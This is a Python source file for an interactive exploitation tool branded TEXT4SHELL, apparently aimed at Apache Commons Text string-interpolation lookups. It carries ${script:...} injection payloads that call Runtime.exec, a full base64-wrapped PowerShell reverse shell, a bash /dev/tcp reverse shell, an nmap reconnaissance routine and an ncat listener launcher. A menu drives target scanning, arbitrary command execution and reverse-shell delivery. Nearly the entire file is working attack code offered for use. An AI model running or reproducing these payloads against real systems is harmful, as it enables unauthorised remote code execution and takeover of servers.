import os
import requests
import colorama
import base64
import nmap
# ASCII-art banner printed by the entry point (it spells TEXT4SHELL). The
# rendered page collapsed runs of spaces, so the layout below is as captured.
name = """
@@@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@ @@@ @@@@@@ @@@ @@@ @@@@@@@@ @@@ @@@
@@@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@ @@@@ @@@@@@@ @@@ @@@ @@@@@@@@ @@@ @@@
@@! @@! @@! !@@ @@! @@!@! !@@ @@! @@@ @@! @@! @@!
!@! !@! !@! @!! !@! !@!!@! !@! !@! @!@ !@! !@! !@!
@!! @!!!:! !@@!@! @!! @!! @!! !!@@!! @!@!@!@! @!!!:! @!! @!!
!!! !!!!!: @!!! !!! !!! !@! !!@!!! !!!@!!!! !!!!!: !!! !!!
!!: !!: !: :!! !!: :!!:!:!!: !:! !!: !!! !!: !!: !!:
:!: :!: :!: !:! :!: !:::!!::: !:! :!: !:! :!: :!: :!:
:: :: :::: :: ::: :: ::: :::: :: :: ::: :: :::: :: :::: :: ::::
: : :: :: : :: : ::: :: : : : : : : :: :: : :: : : : :: : :
<< #~by cryxnet~: >>
"""
# autoreset=True returns the terminal to default colours after every print().
colorama.init(autoreset=True)
# String-interpolation lookup templates keyed by payload type (presumably the
# Apache Commons Text ``${prefix:...}`` lookup syntax, given the banner name —
# the page itself does not say). run() replaces the literal token SHELLCODE
# with the command to execute. From a defensive standpoint, the ``${script:``,
# ``${url:`` and ``${dns:`` prefixes appearing in request parameters are the
# observable indicator of this request shape.
payloads = {
    "script": "${script:javascript:java.lang.Runtime.getRuntime().exec('SHELLCODE')}",
    "url": "${url:UTF-8:java.lang.Runtime.getRuntime().exec('SHELLCODE')}",
    "dns": "${dns:address:java.lang.Runtime.getRuntime().exec('SHELLCODE')}"
}
# Reverse-shell command templates; LHOST and LPORT are placeholder tokens that
# revshell() fills in with the listener address and port. The PowerShell
# variant is base64-encoded by revshell() and launched with ``powershell -e``;
# the POSIX variant is passed through as-is.
powershellRevshell = '$client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
bashRevshell = "sh -i >& /dev/tcp/LHOST/LPORT 0>&1"
# Single module-level python-nmap scanner instance, used by scan().
scanner = nmap.PortScanner()
def run(url, command, payloadType):
    """Send one GET request whose query value is an interpolation payload.

    Args:
        url: target URL up to and including the parameter name; ``"="`` and
            the payload are appended to it verbatim.
        command: text substituted for the SHELLCODE token. An empty string
            keeps the default ``echo H3110 W0RLD``.
        payloadType: ``"URL"`` or ``"DNS"`` selects the matching entry of the
            module-level ``payloads`` dict; any other value (including the
            empty string returned by a bare Enter at the prompt) keeps the
            inline default below. The comparison is case-sensitive.

    Returns:
        The ``requests.Response`` for the request; the status code is not
        inspected here, so a 4xx/5xx is returned rather than raised.
    """
    pld = "{script:javascript:java.lang.Runtime.getRuntime().exec('SHELLCODE')}" # default
    cmd = "echo H3110 W0RLD" # default
    if payloadType == "URL":
        pld = payloads.get("url")
    elif payloadType == "DNS":
        pld = payloads.get("dns")
    if not command == "":
        cmd = command
    # Plain string substitution of the SHELLCODE token; no quoting or encoding
    # is applied to cmd.
    payload = pld.replace('SHELLCODE', cmd)
    result = requests.get(url + "=" + payload)
    return result
def revshell(url, lhost, lport, system, payloadType):
    """Build a reverse-shell command for the target OS and pass it to run().

    Args:
        url: forwarded unchanged to run().
        lhost: listener address substituted for the LHOST token.
        lport: listener port substituted for the LPORT token; it is used as a
            string (``str.replace``), so it must already be a ``str``.
        system: ``"WINDOWS"`` selects ``powershellRevshell``, base64-encoded
            and wrapped in ``powershell -e``; any other value selects
            ``bashRevshell``. The comparison is case-sensitive.
        payloadType: forwarded unchanged to run().

    Returns:
        Whatever run() returns (a ``requests.Response``).
    """
    command = ""
    if system == "WINDOWS":
        # powershell -e expects the UTF-8 script re-encoded as base64 text.
        base64Code = base64.b64encode(bytes(powershellRevshell.replace('LHOST', lhost).replace('LPORT', lport), encoding='utf-8')).decode("utf-8")
        command = 'powershell -e %s' % base64Code
    else:
        command = bashRevshell.replace('LHOST', lhost).replace('LPORT', lport)
    return run(url, command, payloadType)
def scan(ipaddr):
    """Run the shared python-nmap scanner against ``ipaddr``.

    Uses service/version detection (``-sV``) and OS detection (``-O``) and
    returns python-nmap's raw result mapping, which parseScan() formats.
    """
    nmap_arguments = '-sV -O'
    return scanner.scan(arguments=nmap_arguments, hosts=ipaddr)
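def parseScan(output, ipaddr):
    """Format one host's python-nmap result as a human-readable report.

    Args:
        output: the mapping returned by scan() — python-nmap's result dict
            with a top-level ``"scan"`` key holding one entry per host.
        ipaddr: the host key to look up inside ``output["scan"]``. The
            report header shows the IPv4 address recorded by nmap when
            present, otherwise this argument.

    Returns:
        A multi-line string: host summary (hostname, vendor, uptime, OS)
        followed by one block per TCP port. Optional fields that nmap may
        omit (``hostnames``, ``osmatch``, ``uptime``, ``tcp``, per-port
        ``cpe``) render as empty strings instead of raising.

    Raises:
        KeyError: if ``ipaddr`` has no entry under ``output["scan"]``.
    """
    raw_scan = output["scan"][ipaddr]

    # hostnames/osmatch are lists that may be empty; guard the [0] access.
    hostnames = raw_scan.get("hostnames") or []
    hostname = hostnames[0].get("name", "") if hostnames else ""
    os_matches = raw_scan.get("osmatch") or []
    # Named os_name rather than os so the module-level ``os`` is not shadowed.
    os_name = os_matches[0].get("name", "") if os_matches else ""

    ipaddr = raw_scan.get("addresses", {}).get("ipv4", ipaddr)
    vendor = raw_scan.get("vendor", {})
    uptime = raw_scan.get("uptime", {}).get("lastboot", "")
    portscan = raw_scan.get("tcp", {})

    port_sections = []
    for port, info in portscan.items():
        port_sections.append("\n".join([
            "",
            "- - - - - - - - - - - - - - - - - - -",
            f"Port: {port}",
            f"State: {info.get('state', '')}",
            f"Reason: {info.get('reason', '')}",
            f"Name: {info.get('name', '')}",
            f"Product: {info.get('product', '')}",
            f"Version: {info.get('version', '')}",
            # Previously printed the port state under the CPE label.
            f"CPE: {info.get('cpe', '')}",
            "- - - - - - - - - - - - - - - - - - -",
            "",
        ]))
    ports_text = "".join(port_sections)

    return "\n".join([
        "",
        f"Scan Result of {ipaddr}",
        "========================",
        f"Hostname: {hostname}",
        f"Vendor: {vendor}",
        f"Uptime: {uptime}",
        f"OS: {os_name}",
        "========================",
        "Ports:",
        "------------------------",
        ports_text,
        "",
    ])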
def startRevshellListener(lhost, lport):
    """Launch ``ncat -lvnp <lport>`` in a new window via ``os.system``.

    ``lhost`` is accepted but not used. The command line is built by
    %-formatting from the interactive prompt input and executed through the
    shell; ``start`` is a cmd.exe builtin, so this only works on Windows, and
    ``lport`` is interpolated without any validation.
    """
    os.system("start ncat -lvnp %s" % (lport))
if __name__ == '__main__':
    print(colorama.Fore.RED + name + "\n")
    # Interactive menu loop. There is no quit option; int() raises ValueError
    # on non-numeric input, and a number other than 0/1/2 simply redraws the
    # menu.
    while True:
        print(colorama.Fore.RED + """
[0] Scan target informations
[1] Execute customized shell command
[2] Execute Reverseshell
\n
""")
        mId = int(input(colorama.Fore.CYAN + "#~ Enter Number >> "))
        if mId == 0:
            # nmap -sV -O of a single host, formatted by parseScan().
            ipaddr = input(colorama.Fore.BLUE + "#~ Enter IP-Address of target >> ")
            print(colorama.Fore.BLUE + "[+] Scanning Target")
            print(colorama.Fore.YELLOW + "[INFO] Scan can take up to 3 minutes and more")
            print(parseScan(scan(ipaddr), ipaddr))
        elif mId == 1:
            # Empty answers keep run()'s defaults; payloadType is matched
            # case-sensitively against "URL"/"DNS".
            url = input("#~ Enter URL of target >> ")
            command = input("#~ Enter command [enter for default: echo] >> ")
            payloadType = input("#~ Enter the type of payload [enter for default: script] >> ")
            print(colorama.Fore.BLUE + "[+] Running attack")
            print(run(url, command, payloadType))
        elif mId == 2:
            # lport stays a str; revshell() substitutes it textually.
            url = input("#~ Enter URL of target >> ")
            lhost = input("#~ Enter IP-Address of listener host >> ")
            lport = input("#~ Enter PORT of listener host >> ")
            system = input("#~ Enter system os of target >> ")
            payloadType = input("#~ Enter the type of payload [enter for default: script] >> ")
            print(colorama.Fore.BLUE + "[+] Executing RCE Revshell Attack")
            startRevshellListener(lhost, lport)
            print(revshell(url, lhost, lport, system, payloadType))